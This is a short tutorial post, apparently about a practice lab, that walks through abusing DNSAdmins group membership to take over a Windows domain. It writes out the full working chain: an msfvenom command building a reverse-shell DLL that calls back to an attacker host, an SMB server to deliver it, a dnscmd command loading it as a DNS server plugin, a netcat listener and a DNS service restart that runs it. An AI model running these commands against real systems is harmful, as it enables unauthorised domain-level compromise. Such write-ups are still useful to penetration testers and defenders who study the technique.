This post will cover a very specific privilege escalation technique: Abusing DNSAdmin membership to gain domain admin.
Preppin
First, we must determine whether our user belongs to the DNSAdmins group.
We can see that our user is a member of the DNSAdmins group. (MEGABANK\DnsAdmins)
Creating & serving the malicious DLL
We need to create a malicious DLL file that will be supplied as the serverlevelplugindll. here, I used msfvenom tool to generate a malicious DLL file.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.X LPORT=4444 --platform=windows -f dll > ~/Desktop/plugin.dll
Now we have the malicious DLL file. let’s use impacket’s smbserver.py SMB server to serve this DLL file to our victim machine.
sudo python smbserver.py -debug SHARE /home/kali/share
Injecting the DLL
Now we will use dnscmd.exe to set our newly created DLL as a config file for DNS. Dnscmd is a command line interface for managing a DNS server. we can use this tool to automate routing DNS management or perform simple unattended setup and configuration of new DNS servers on our network.
Run the below command to inject the DLL file:
C:\>dnscmd.exe BANK.local /config /serverlevelplugindll \10.10.10.X\SHARE\plugin.dll
Before you continue, make sure you have started your listener on the attack machine. So, you are able to catch the reverse shell.
$nc -nvlp 4444
Once you are done with the Netcat listener, we can restart the DNS service to execute our malicious DLL.
$sc.exe stop dns
$sc.exe start dns
After that, go back and check your netcat listener, you should have a reverse shell. 😎